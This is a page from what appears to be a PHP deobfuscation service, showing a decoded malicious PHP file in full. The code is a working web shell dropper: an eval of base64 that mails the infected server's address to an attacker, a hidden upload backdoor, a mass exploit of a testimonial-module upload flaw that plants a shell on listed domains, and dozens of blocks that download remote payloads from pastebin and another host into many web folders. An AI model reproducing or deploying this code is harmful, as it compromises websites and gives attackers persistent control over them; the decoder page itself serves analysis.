Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $encoded = 'JHRpbWVfc2hlbGwgPSAiIi5kYXRlKCJkL20vWSAtIEg6aTpzIikuIiI7DQokaXBfcmVtb3Rl..

Decoded Output download

$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = '[email protected]';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode
Reply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);

Did this file decode correctly?

Original Code

<?php $encoded = 'JHRpbWVfc2hlbGwgPSAiIi5kYXRlKCJkL20vWSAtIEg6aTpzIikuIiI7DQokaXBfcmVtb3RlID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokZnJvbV9zaGVsbGNvZGUgPSAnc2hlbGxAJy5nZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKS4nJzsNCiR0b19lbWFpbCA9ICdicmF6aWxvYnNjdXJlQGxpdmUuY29tJzsNCiRzZXJ2ZXJfbWFpbCA9ICIiLmdldGhvc3RieW5hbWUoJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10pLiIgIC0gIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIiI7DQokbGlua2NyID0gIkxpbms6ICIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uIiIuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10uIiAtIElQIEV4Y3V0aW5nOiAkaXBfcmVtb3RlIC0gVGltZTogJHRpbWVfc2hlbGwiOw0KJGhlYWRlciA9ICJGcm9tOiAkZnJvbV9zaGVsbGNvZGVcclxuUmVwbHktdG86ICRmcm9tX3NoZWxsY29kZSI7DQpAbWFpbCgkdG9fZW1haWwsICRzZXJ2ZXJfbWFpbCwgJGxpbmtjciwgJGhlYWRlcik7=='; eval(base64_decode($encoded)); $cwd = getcwd(); $Iraqe = $_GET['mr']; if($Iraqe == 'chmod'){ $filename = $_FILES['file']['name']; $filetmp = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'>
	<input type='file'name='file' />
	<input type='submit' value='go' />

</form>"; if(move_uploaded_file($filetmp,$filename)=='1'){ echo 'Concluido ----> '.$filename; } } set_time_limit(0); error_reporting(0); function curl($url,$post,$data,$headers,$header,$cookie) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); if($post) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } if($cookie) { curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); } else { curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); } if($headers) { curl_setopt($ch, CURLOPT_HTTPHEADER, $header); } $exec = curl_exec($ch); $info = curl_getinfo($ch); return array( "http" => $info['http_code'], "response" => $exec ); curl_close($ch); } $filename = htmlspecialchars($_POST['filename']); $script = $_POST['source']; $domains = explode("\r\n", htmlspecialchars($_POST['target'])); $go = $_POST['exploit']; if(isset($go)) { $handle = fopen($filename, "w"); fwrite($handle, $script); fclose($handle); foreach($domains as $target) { if(!preg_match("/^http:\/\//", $target) AND !preg_match("/^https:\/\//", $target)) { $target = "http://$target/"; } echo "[+] URL: $target<br>"; $post = array( "testimonial_submitter_name" => "brazilobscure", "testimonial_title" => "hacked by chmod", "testimonial_main_message" => "hacked by chmod", "testimonial_img" => "@$filename", "testimonial" => "Submit Testimonial", ); $exploit = curl("$target/modules/blocktestimonial/addtestimonial.php", TRUE, $post, FALSE, NULL, TRUE); $cek_shell = curl("$target/upload/$filename", FALSE, NULL, FALSE, NULL, FALSE); if(preg_match("/Your testimonial was submitted successfully./", $exploit['response'])) { echo "[+] Upload Com Sucesso !<br>"; if($cek_shell['http'] == 200) { echo "[+] $target/upload/$filename<br><br>"; } else { echo "[+] Shell Nao Encontrada <br><br>"; } } else { echo "[+] Falhou <br><br>"; } } } function http_get($url){ $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } $check = $_SERVER['DOCUMENT_ROOT'] . "/up.php" ; $text = http_get('http://pastebin.com/raw/uUFM9h8Z'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ }else echo ""; $check0 = $_SERVER['DOCUMENT_ROOT'] . "/xx1.php" ; $text0 = http_get('http://pastebin.com/raw/3e7RmzMA'); $open0 = fopen($check0, 'w'); fwrite($open0, $text0); fclose($open0); if(file_exists($check0)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/up1.php" ; $text2 = http_get('http://pastebin.com/raw/dSucuQ7R'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check3=$_SERVER['DOCUMENT_ROOT'] . "/indexx.html" ; $text3 = http_get('http://www.transitron.com/'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); if(file_exists($check3)){ }else echo ""; $check5 = $_SERVER['DOCUMENT_ROOT'] . "/produtos.php" ; $text5 = http_get('http://pastebin.com/raw/dsxfw1qc'); $open5 = fopen($check5, 'w'); fwrite($open5, $text5); fclose($open5); if(file_exists($check5)){ }else echo ""; $check6 = $_SERVER['DOCUMENT_ROOT'] . "/produtos_new.php" ; $text6 = http_get('http://pastebin.com/raw/RKuW5f7u'); $open6 = fopen($check6, 'w'); fwrite($open6, $text6); fclose($open6); if(file_exists($check6)){ }else echo ""; $check = $_SERVER['DOCUMENT_ROOT'] . "/up.php" ; $text = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ }else echo ""; $check0 = $_SERVER['DOCUMENT_ROOT'] . "/xx1.php" ; $text0 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open0 = fopen($check0, 'w'); fwrite($open0, $text0); fclose($open0); if(file_exists($check0)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/up1.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check3=$_SERVER['DOCUMENT_ROOT'] . "/indexx.html" ; $text3 = http_get('http://www.transitron.com/'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); if(file_exists($check3)){ }else echo ""; $check5 = $_SERVER['DOCUMENT_ROOT'] . "/produtos.php" ; $text5 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open5 = fopen($check5, 'w'); fwrite($open5, $text5); fclose($open5); if(file_exists($check5)){ }else echo ""; $check6 = $_SERVER['DOCUMENT_ROOT'] . "/produtos_new.php" ; $text6 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open6 = fopen($check6, 'w'); fwrite($open6, $text6); fclose($open6); if(file_exists($check6)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/tmp/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/media/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/plugins/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/logs/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/teste/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/test/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/x/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/scripts/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/site/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/novosite/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/new/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/controle/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/sistema/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/sistemas/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/cache/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/admin/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/adm/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/administrator/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/painel/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/images/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/up/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/arquivos/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/files/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/fotos/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/file/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/config/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/modules/up.php" ; $text2 = http_get('http://westernman.mx/libraries/joomla/document/json/a.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ }else echo ""; ?>

Function Calls

getcwd 1
base64_decode 1

Variables

$encoded JHRpbWVfc2hlbGwgPSAiIi5kYXRlKCJkL20vWSAtIEg6aTpzIikuIiI7DQok..

Stats

MD5 809a6d40e7747637efd4d73d7cb13770
Eval Count 1
Decode Time 114 ms